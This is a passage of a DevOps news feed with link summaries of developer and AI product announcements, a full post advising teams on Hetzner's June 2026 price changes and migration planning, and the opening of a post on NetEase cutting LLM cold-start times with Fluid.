<h3 id="h3-how-we-built-cloudflares-data-platform-and-an-ai-agent-on-top-of-it" class="group relative scroll-mt-24">
        <a href="#h3-how-we-built-cloudflares-data-platform-and-an-ai-agent-on-top-of-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we built Cloudflare's data platform and an AI agent on top of it
        </a>
        </h3><p>Here’s how we built Town Lake, Cloudflare&#39;s unified analytics platform, alongside Skipper, an internal AI agent running on top of it.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/our-unified-data-platform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-launches-ai-roi-visibility-tools-for-enterprises" class="group relative scroll-mt-24">
        <a href="#h3-harness-launches-ai-roi-visibility-tools-for-enterprises" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness Launches AI ROI Visibility Tools for Enterprises
        </a>
        </h3><p>Announcing AI DLC Insights and Cloud &amp; AI Cost Management: two new products that give engineering organizations real answers on what they are spending on AI, and whether that investment is worth it.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/harness-launches-products-give-visibility-into-roi-of-ai-spend"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        </h2><h3 id="h3-visual-studio-code-1123" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1123" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.123
        </a>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.123 (Insiders)</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_123"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-canonical-support-solves-hard-linux-performance-bugs-even-in-12-year-old-code" class="group relative scroll-mt-24">
        <a href="#h3-how-canonical-support-solves-hard-linux-performance-bugs-even-in-12-year-old-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Canonical Support solves hard Linux performance bugs – even in 12-year old code
        </a>
        </h3><p>A 12-year-old bug in libnss-db caused getent enumeration to slow to a crawl – and showed how far expert support can go when a customer brings the right evidence and the right question.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/support-solves-bugs-in-12-year-old-code"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins" class="group relative scroll-mt-24">
        <a href="#h3-stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Stop Pasting Tokens: OAuth2 Login for JetBrains IDE Plugins
        </a>
        </h3><p>The moment a plugin needs account data, a simple API call turns into an authentication problem. The bad shortcut is familiar: ask the user to create a personal access token (PAT), make them paste it i</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/platform/2026/06/stop-pasting-tokens-oauth2-login-for-jetbrains-ide-plugins/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-mellum2-goes-open-source-a-fast-model-for-ai-workflows" class="group relative scroll-mt-24">
        <a href="#h3-mellum2-goes-open-source-a-fast-model-for-ai-workflows" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Mellum2 Goes Open Source: A Fast Model for AI Workflows
        </a>
        </h3><p>Trained from scratch and designed for practical deployment, Mellum2 is built for routing, Q&amp;A, sub-agents, and private AI use in software engineering systems. Today, we’re open-sourcing Mellum2, a 12B</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/ai/2026/06/mellum2-goes-open-source-a-fast-model-for-ai-workflows/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-xai-opens-grok-build-01-to-developers-via-api" class="group relative scroll-mt-24">
        <a href="#h3-xai-opens-grok-build-01-to-developers-via-api" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 xAI Opens Grok Build 0.1 to Developers via API
        </a>
        </h3><p>xAI&#39;s Grok Build 0.1 is now available in public beta via the xAI API — a fast, purpose-built coding model for agentic workflows, debugging, and MCP support.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/xai-opens-grok-build-0-1-to-developers-via-api/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-to-fix-common-typescript-issues-with-qodana" class="group relative scroll-mt-24">
        <a href="#h3-how-to-fix-common-typescript-issues-with-qodana" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How To Fix Common TypeScript Issues With Qodana
        </a>
        </h3><p>Most TypeScript projects already run ESLint with @typescript-eslint. That covers a lot: explicit any, floating promises, non-null assertions, and more. If your linting setup is solid, you’re catching </p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/fix-common-typescript-issues/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate" class="group relative scroll-mt-24">
        <a href="#h3-claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Claude Code’s Dynamic Workflows Take on the Tasks That Were Too Big to Automate
        </a>
        </h3><p>Anthropic&#39;s Claude Code dynamic workflows run parallel subagents to tackle codebase-wide audits, large migrations, and complex engineering tasks end-to-end.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/claude-codes-dynamic-workflows-take-on-the-tasks-that-were-too-big-to-automate/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code" class="group relative scroll-mt-24">
        <a href="#h3-microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Microsoft Brings MCP to Geospatial Workflows With Planetary Computer Pro Tools for VS Code
        </a>
        </h3><p>Microsoft&#39;s Planetary Computer Pro MCP Tools for VS Code bring 35+ geospatial tools into GitHub Copilot via natural-language prompts.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/microsoft-brings-mcp-to-geospatial-workflows-with-planetary-computer-pro-tools-for-vs-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-ai-agent-workflows-on-ubuntu-with-the-new-nvidia-openshell-snap" class="group relative scroll-mt-24">
        <a href="#h3-securing-ai-agent-workflows-on-ubuntu-with-the-new-nvidia-openshell-snap" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing AI agent workflows on Ubuntu with the new NVIDIA OpenShell snap
        </a>
        </h3><p>By packaging OpenShell as a snap, Canonical is enabling enterprises to confidently run next-generation agentic workflows across local devices, hybrid environments, and private clouds.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/nvidia-openshell-ubuntu-announcement"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gavriel-cohen-found-his-own-code-inside-openclaw-so-he-walked-away" class="group relative scroll-mt-24">
        <a href="#h3-gavriel-cohen-found-his-own-code-inside-openclaw-so-he-walked-away" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gavriel Cohen found his own code inside OpenClaw, so he walked away
        </a>
        </h3><p>When Gavriel Cohen first saw OpenClaw, he knew he wanted it. At the time, Cohen (soon to be the founder</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/nanoclaw-openclaw-agent-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-retrieval-at-scale-is-becoming-a-systems-problem-not-a-tooling-problem" class="group relative scroll-mt-24">
        <a href="#h3-ai-retrieval-at-scale-is-becoming-a-systems-problem-not-a-tooling-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI retrieval at scale is becoming a systems problem, not a tooling problem
        </a>
        </h3><p>AI retrieval has moved well beyond embeddings and vector search. Early retrieval architectures focused primarily on semantic similarity. Still, production</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/ai-retrieval-at-scale/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-i-tested-cursors-new-jira-integration-and-its-5-stars-no-notes-heres-why" class="group relative scroll-mt-24">
        <a href="#h3-i-tested-cursors-new-jira-integration-and-its-5-stars-no-notes-heres-why" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 I tested Cursor’s new Jira integration and it’s 5 stars, no notes. Here’s why.
        </a>
        </h3><p>Cursor launched its Jira integration last week. The integration was marketed as simple: assign a ticket in Jira and Cursor</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/cursor-jira-integration-test/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Hetzner's Third Price Increase in Three Months: What DevOps Teams Should Do]]></title>
      <link>https://devops-daily.com/posts/hetzner-price-increases-2026</link>
      <description><![CDATA[Hetzner is changing dedicated server and cloud pricing again on June 15, 2026. Here is what changed, why customers are frustrated, and how to decide whether to stay, resize, or move workloads.]]></description>
      <pubDate>Thu, 28 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hetzner-price-increases-2026</guid>
      <category><![CDATA[FinOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[FinOps]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[Hetzner]]></category><category><![CDATA[DigitalOcean]]></category><category><![CDATA[Cost Optimization]]></category><category><![CDATA[Infrastructure]]></category>
      <content:encoded><![CDATA[<p>Hetzner has announced another pricing change, effective June 15, 2026. For many teams, the headline is not just &quot;prices are going up.&quot; It is that this feels like the third Hetzner pricing shock in roughly three months, with the newest announcement landing before customers can see the final price table.</p>
<p>If you run production workloads on Hetzner, this is not a reason to panic-migrate. It is a reason to get precise about exposure: which servers are protected by existing terms, which workloads need new capacity soon, and which systems could move without turning a pricing update into an outage.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><p>Hetzner&#39;s <a href="https://www.hetzner.com/pressroom/standardization-and-price-adjustment-of-our-server-products/">May 27 announcement</a> says it is standardizing dedicated server products and increasing monthly prices for new orders. The changes take effect on June 15, 2026.</p>
<p>The operational takeaways:</p>
<ul>
<li>Existing rented servers keep their current terms for this adjustment.</li>
<li>New orders, rescales, and future products can be affected.</li>
<li>Dedicated servers and cloud plans at all locations are in scope.</li>
<li>Server Auction, IPs, storage products, Load Balancers, Volumes, Snapshots, Object Storage, web hosting, and managed servers are listed as not affected by this specific announcement.</li>
<li>Hetzner has not published the final new prices yet.</li>
<li>The Reddit reaction is mostly about repeated adjustments and unclear numbers, not just the existence of a price increase.</li>
</ul>
<p>The right move is to build a short exposure report before deciding anything. Stable existing servers may be fine. Workloads that need frequent resizing deserve a closer look.</p>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><p>Before you make a provider decision, gather:</p>
<ul>
<li>A current list of Hetzner cloud servers, dedicated servers, and Server Auction machines</li>
<li>Monthly spend by product line, environment, and owner</li>
<li>Planned capacity changes for the next 30-90 days</li>
<li>A backup and restore status for every production datastore</li>
<li>DNS TTLs, load balancer dependencies, and IP allowlists</li>
<li>One realistic fallback provider for each workload class</li>
</ul>
<h2 id="h2-what-actually-changed" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What Actually Changed
        </a>
        </h2><p>Hetzner&#39;s May 27 announcement has two separate parts.</p>
<p>First, Hetzner is standardizing the dedicated server portfolio. New dedicated server models will use clearer suffixes such as <code>-1</code>, <code>-2</code>, and <code>-3</code>. A <code>-1-Ltd</code> suffix will mark limited-quantity servers built from lower-cost hardware components.</p>
<p>Second, Hetzner says monthly prices are increasing for new orders. The company points to hardware procurement pressure, especially the cost of server components. It also says setup fees will be reduced for most dedicated servers.</p>
<p>For operators, the most important scope detail is this: currently rented servers are not affected by this specific adjustment. New orders, rescales of existing servers, and future products under the new structure are affected.</p>
<p>That creates two very different situations:</p>
<ul>
<li>A stable dedicated server fleet may not see an immediate bill change.</li>
<li>A growing cloud or dedicated fleet can still be exposed as soon as it adds or rescales capacity.</li>
</ul>
<p>That distinction matters. &quot;Hetzner is raising prices&quot; is too vague to act on. &quot;Our CI runner fleet creates new cloud servers every week&quot; is actionable.</p>
<h2 id="h2-why-customers-are-frustrated" class="group relative scroll-mt-24">
        <a href="#h2-why-customers-are-frustrated" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why Customers Are Frustrated
        </a>
        </h2><p>The Reddit thread titled <a href="https://www.reddit.com/r/hetzner/comments/1tpwusm/third_price_increase_in_three_months/">Third price increase in three months</a> is a good snapshot of the mood. Several comments focus on the same point: Hetzner announced another change, but the new prices are not visible yet.</p>
<p>That frustration did not come from nowhere. Hetzner&#39;s own pressroom shows a run of pricing-related updates in 2026:</p>
<table>
<thead>
<tr>
<th>Date</th>
<th>Hetzner communication</th>
<th>What changed</th>
</tr>
</thead>
<tbody><tr>
<td>February 2, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/statement-setup-fees-adjustment/">Statement on the adjustment of setup fees</a></td>
<td>Hetzner said dedicated server setup fees were changing because RAM and NVMe SSD procurement costs had risen.</td>
</tr>
<tr>
<td>February 23, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/statement-price-adjustment/">Statement on price adjustment as of April 1st 2026</a></td>
<td>Hetzner announced price changes for existing products and new orders effective April 1.</td>
</tr>
<tr>
<td>April 29, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/statement-on%20the-latest-adjustment-to%20setup-fees/">Statement on the latest adjustment to setup fees</a></td>
<td>Hetzner adjusted dedicated server setup fees again.</td>
</tr>
<tr>
<td>May 27, 2026</td>
<td><a href="https://www.hetzner.com/pressroom/standardization-and-price-adjustment-of-our-server-products/">Standardization and price adjustment effective June 15, 2026</a></td>
<td>Hetzner announced the new product structure and monthly price increases for new orders and rescales.</td>
</tr>
</tbody></table>
<p>Depending on how you count setup fees versus monthly prices, people will debate whether this is the third or fourth adjustment. For planning, that debate is less important than the pattern: teams can no longer assume Hetzner pricing is static across the year.</p>
<h2 id="h2-the-risk-is-bigger-than-the-monthly-bill" class="group relative scroll-mt-24">
        <a href="#h2-the-risk-is-bigger-than-the-monthly-bill" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The Risk Is Bigger Than the Monthly Bill
        </a>
        </h2><p>The obvious risk is a higher bill. The more useful question is whether the price change breaks an assumption in your infrastructure plan.</p>
<p>Examples:</p>
<ul>
<li>You planned to resize a database host after a traffic launch.</li>
<li>You rely on cheap ephemeral cloud workers for CI or batch jobs.</li>
<li>You sell hosting with thin margins and fixed customer pricing.</li>
<li>You keep extra capacity around because adding capacity has historically been cheap.</li>
<li>You assume Hetzner is always the cheapest acceptable provider, so no one has tested a fallback.</li>
</ul>
<p>Those are different problems. A stable server that keeps its terms needs documentation and monitoring. A workload that creates new machines every day needs a cost model.</p>
<h2 id="h2-build-an-exposure-report" class="group relative scroll-mt-24">
        <a href="#h2-build-an-exposure-report" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Build an Exposure Report
        </a>
        </h2><p>Start with a small table. Do not try to solve the whole migration question in one meeting.</p>
<pre><code class="hljs language-text">Workload        Product type      Current state      Next resize?     Move difficulty
api-prod        Hetzner Cloud     existing           yes, 30 days     medium
postgres-prod   Dedicated AX      existing           no               high
ci-runners      Cloud             ephemeral          yes, weekly      low
object-store    Object Storage    existing           no               medium
staging         Cloud             existing           flexible         low
</code></pre><p>The useful column is <code>Next resize?</code>. Existing servers may be protected from this specific adjustment, but growth can still put you onto new pricing.</p>
<p>If you use the Hetzner Cloud CLI, export the current fleet first:</p>
<pre><code class="hljs language-bash">hcloud server list -o columns=<span class="hljs-built_in">id</span>,name,<span class="hljs-built_in">type</span>,location,status,ipv4
hcloud volume list -o columns=<span class="hljs-built_in">id</span>,name,size,location,server
hcloud load-balancer list -o columns=<span class="hljs-built_in">id</span>,name,<span class="hljs-built_in">type</span>,location
</code></pre><p>Then add the context the CLI cannot know:</p>
<ul>
<li>Who owns the workload?</li>
<li>Is it production, staging, CI, or batch?</li>
<li>Does it need new capacity before June 15?</li>
<li>Does it have tested backups?</li>
<li>Could it run somewhere else with only DNS and secret changes?</li>
</ul>
<p>This turns a provider announcement into a concrete task list.</p>
<h2 id="h2-decide-by-workload-class" class="group relative scroll-mt-24">
        <a href="#h2-decide-by-workload-class" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Decide by Workload Class
        </a>
        </h2><p>Do not make one global decision for everything on Hetzner.</p>
<h3 id="h3-stable-dedicated-servers" class="group relative scroll-mt-24">
        <a href="#h3-stable-dedicated-servers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Stable dedicated servers
        </a>
        </h3><p>If an existing dedicated server is stable, well-utilized, and hard to move, staying put may be the best decision. The announcement says currently rented servers are not affected by this adjustment.</p>
<p>For these systems, do the boring work:</p>
<ul>
<li>Confirm the current billing terms.</li>
<li>Record the hardware specs and replacement plan.</li>
<li>Verify backups with a restore test.</li>
<li>Keep a migration runbook current even if you do not plan to use it.</li>
</ul>
<h3 id="h3-frequently-resized-cloud-workloads" class="group relative scroll-mt-24">
        <a href="#h3-frequently-resized-cloud-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Frequently resized cloud workloads
        </a>
        </h3><p>These deserve the closest review. If your workload adds capacity often, the &quot;new orders and rescales&quot; language matters.</p>
<p>Model total workload cost, not just VM price:</p>
<pre><code class="hljs language-text">Monthly workload cost =
  compute
+ block storage
+ snapshots
+ backups
+ load balancers
+ bandwidth overages
+ support
+ engineering time
</code></pre><p>The cheapest VM is not always the cheapest workload. If a provider saves $40/month but adds three hours of operational work every month, it is not cheaper for a real team.</p>
<h3 id="h3-low-risk-disposable-workloads" class="group relative scroll-mt-24">
        <a href="#h3-low-risk-disposable-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Low-risk disposable workloads
        </a>
        </h3><p>If you want to reduce provider concentration, start here:</p>
<ul>
<li>CI runners</li>
<li>Preview environments</li>
<li>Batch workers</li>
<li>Staging apps</li>
<li>Stateless internal tools</li>
</ul>
<p>These systems are useful migration drills. They reveal missing Terraform modules, secrets assumptions, DNS gaps, and observability gaps without putting your primary database at risk.</p>
<h2 id="h2-keep-one-simple-fallback-ready" class="group relative scroll-mt-24">
        <a href="#h2-keep-one-simple-fallback-ready" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keep One Simple Fallback Ready
        </a>
        </h2><p>For smaller teams, it helps to keep one boring fallback provider ready. DigitalOcean is a reasonable candidate for this role. It is not a perfect replacement for Hetzner dedicated servers, but it is easy to price, easy to explain, and good enough for many web apps, staging environments, internal tools, and smaller production services.</p>
<p>DigitalOcean&#39;s <a href="https://www.digitalocean.com/pricing/droplets">Droplet pricing</a> currently starts at $4/month for basic VMs, and the pricing page says Droplets use per-second billing with a monthly cap. That kind of predictable pricing is useful when your goal is optionality, not chasing the absolute lowest benchmark score.</p>
<p>Use any fallback provider as a test target first:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">provider:</span> <span class="hljs-string">digitalocean</span>
<span class="hljs-attr">candidate_workloads:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ci-runners</span>
    <span class="hljs-attr">reason:</span> <span class="hljs-string">stateless</span> <span class="hljs-string">and</span> <span class="hljs-string">easy</span> <span class="hljs-string">to</span> <span class="hljs-string">recreate</span>
    <span class="hljs-attr">rollback:</span> <span class="hljs-string">disable</span> <span class="hljs-string">new</span> <span class="hljs-string">runners</span> <span class="hljs-string">and</span> <span class="hljs-string">re-enable</span> <span class="hljs-string">Hetzner</span> <span class="hljs-string">runners</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">staging-api</span>
    <span class="hljs-attr">reason:</span> <span class="hljs-string">low</span> <span class="hljs-string">traffic</span> <span class="hljs-string">with</span> <span class="hljs-string">simple</span> <span class="hljs-string">DNS</span> <span class="hljs-string">rollback</span>
    <span class="hljs-attr">rollback:</span> <span class="hljs-string">point</span> <span class="hljs-string">staging</span> <span class="hljs-string">DNS</span> <span class="hljs-string">back</span> <span class="hljs-string">to</span> <span class="hljs-string">Hetzner</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">internal-dashboard</span>
    <span class="hljs-attr">reason:</span> <span class="hljs-string">low</span> <span class="hljs-string">customer</span> <span class="hljs-string">impact</span> <span class="hljs-string">and</span> <span class="hljs-string">simple</span> <span class="hljs-string">data</span> <span class="hljs-string">model</span>
    <span class="hljs-attr">rollback:</span> <span class="hljs-string">restore</span> <span class="hljs-string">previous</span> <span class="hljs-string">deployment</span> <span class="hljs-string">target</span>
</code></pre><p>The goal is not to move everything. The goal is to make sure your team has a path if the final prices change the math.</p>
<h2 id="h2-migration-checklist" class="group relative scroll-mt-24">
        <a href="#h2-migration-checklist" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Migration Checklist
        </a>
        </h2><p>If the June 15 prices push you toward migration, move in phases.</p>
<h3 id="h3-phase-1-classify-systems" class="group relative scroll-mt-24">
        <a href="#h3-phase-1-classify-systems" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 1: Classify systems
        </a>
        </h3><pre><code class="hljs language-text">Class A: stateful production systems, high migration risk
Class B: stateless production services, medium migration risk
Class C: staging, CI, batch, internal tools, low migration risk
</code></pre><p>Move Class C first. Leave Class A alone until restore tests, load tests, and rollback steps are proven.</p>
<h3 id="h3-phase-2-prove-backups" class="group relative scroll-mt-24">
        <a href="#h3-phase-2-prove-backups" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 2: Prove backups
        </a>
        </h3><p>For PostgreSQL, do not stop at &quot;backup job succeeded.&quot; Restore it:</p>
<pre><code class="hljs language-bash">pg_dump --format=custom --file=prod.dump <span class="hljs-string">&quot;<span class="hljs-variable">$DATABASE_URL</span>&quot;</span>
createdb restore_test
pg_restore --dbname=restore_test --clean --if-exists prod.dump
psql restore_test -c <span class="hljs-string">&quot;select count(*) from users;&quot;</span>
</code></pre><p>For object storage, test reads from the restored copy:</p>
<pre><code class="hljs language-bash">aws s3 <span class="hljs-built_in">sync</span> s3://current-bucket ./restore-check \
  --endpoint-url <span class="hljs-string">&quot;<span class="hljs-variable">$CURRENT_S3_ENDPOINT</span>&quot;</span>

find ./restore-check -<span class="hljs-built_in">type</span> f | <span class="hljs-built_in">head</span>
</code></pre><h3 id="h3-phase-3-lower-dns-ttls-early" class="group relative scroll-mt-24">
        <a href="#h3-phase-3-lower-dns-ttls-early" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 3: Lower DNS TTLs early
        </a>
        </h3><p>Set lower TTLs before the cutover window:</p>
<pre><code class="hljs language-text">api.example.com. 300 IN A 203.0.113.10
</code></pre><p>Do this before you need it. A five-minute TTL does not help if resolvers cached yesterday&#39;s one-day TTL.</p>
<h3 id="h3-phase-4-move-stateless-services-before-databases" class="group relative scroll-mt-24">
        <a href="#h3-phase-4-move-stateless-services-before-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 4: Move stateless services before databases
        </a>
        </h3><p>Move app instances first when possible. Keep the database in place, connect across providers temporarily, and measure latency. That gives you a safer rollback path than moving compute and data at the same time.</p>
<h3 id="h3-phase-5-move-state-last" class="group relative scroll-mt-24">
        <a href="#h3-phase-5-move-state-last" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 5: Move state last
        </a>
        </h3><p>Only move databases after you have:</p>
<ul>
<li>A recent restore test</li>
<li>A write-freeze or replication plan</li>
<li>A rollback point</li>
<li>Application-level health checks</li>
<li>A clear error-budget agreement</li>
</ul>
<h2 id="h2-when-staying-is-the-right-call" class="group relative scroll-mt-24">
        <a href="#h2-when-staying-is-the-right-call" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          When Staying Is the Right Call
        </a>
        </h2><p>Staying with Hetzner may still be the best answer.</p>
<p>Stay if:</p>
<ul>
<li>Your existing contracts are not affected and the workload is stable.</li>
<li>The workload uses dedicated hardware efficiently.</li>
<li>Migration risk is higher than likely savings.</li>
<li>You depend on Hetzner-specific networking, locations, or workflows.</li>
<li>Your team does not have time to validate another provider properly.</li>
</ul>
<p>FinOps is not &quot;move providers whenever prices change.&quot; It is knowing which assumptions changed and which ones did not.</p>
<h2 id="h2-what-to-watch-on-june-15" class="group relative scroll-mt-24">
        <a href="#h2-what-to-watch-on-june-15" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to Watch on June 15
        </a>
        </h2><p>When Hetzner publishes the final prices, check:</p>
<ul>
<li>Cloud plan prices by region</li>
<li>Dedicated server monthly prices under the new <code>-1</code>, <code>-2</code>, <code>-3</code>, and <code>-1-Ltd</code> structure</li>
<li>Setup fee reductions versus monthly increases</li>
<li>Rescale behavior for existing cloud servers</li>
<li>Whether limited products affect capacity planning</li>
<li>Differences between Germany, Finland, Singapore, and US locations</li>
</ul>
<p>Then update the exposure report with real numbers.</p>
<h2 id="h2-bottom-line" class="group relative scroll-mt-24">
        <a href="#h2-bottom-line" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bottom Line
        </a>
        </h2><p>Hetzner&#39;s latest announcement is not automatically a migration trigger. It is a planning trigger.</p>
<p>If your fleet is stable, you may only need to document terms and wait for the final price table. If your workloads resize often, run close to margin, or depend on cheap disposable capacity, model the impact now.</p>
<p>The practical response is simple: know what is exposed, prove your backups, test one fallback path, and avoid making a rushed provider decision on June 15.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[How NetEase Games Cut LLM Cold Starts From 42 Minutes to 30 Seconds Using Fluid]]></title>
      <link>https://devops-daily.com/posts/netease-fluid-30-second-llm-cold-starts-kubernetes</link>
      <description><![CDATA[NetEase Games published a Kubernetes case study walking through how they took their serverless GPU inference cold-start time from 42 minutes down to under 30 seconds. The bottleneck isn't the GPU. It's the 60GB model weights crossing a region. Here is what they did with the CNCF Fluid project and how to apply the same pattern even if you are not on Kubernetes.]]></description>
      <pubDate>Tue, 26 May 2026 11:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/netease-fluid-30-second-llm-cold-starts-kubernetes</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[AI]]></category><category><![CDATA[GPU]]></category><category><![CDATA[CNCF]]></category>
      <content:encoded><![CDATA[<p>NetEase Games published a case study on the CNCF blog last week walking through how they took serverless LLM inference cold-start times from a wince-inducing 42 minutes down to roughly 30 seconds. The framing line in the post is the one worth taping above your desk: <strong>&quot;elastic compute is only useful if data can move just as fast.&quot;</strong> If you run inference workloads on Kubernetes and you have ever waited for a model to &quot;warm up&quot; on a fresh pod, you have hit this wall.</p>
<p>The interesting thing about the case study isn&#39;t the headline 84x speedup. It&#39;s the staircase. They publish four numbers, each a different architecture, each a meaningful intermediate stop. The path looks like this:</p>
<pre><code class="hljs language-text">Cross-region direct access from S3-like storage    : 42 minutes
Traditional cache layer (raw Alluxio)              : 14 minutes
Fluid-based prefetching                            :  3 minutes
Production-tuned Fluid with proactive warmup       : 30 seconds (sometimes under)
</code></pre><p>Each step is a different bet about where the bottleneck actually is. This post walks through the bets, why they paid off, and what patterns transfer to your stack if you are not running NetEase&#39;s exact architecture.</p>
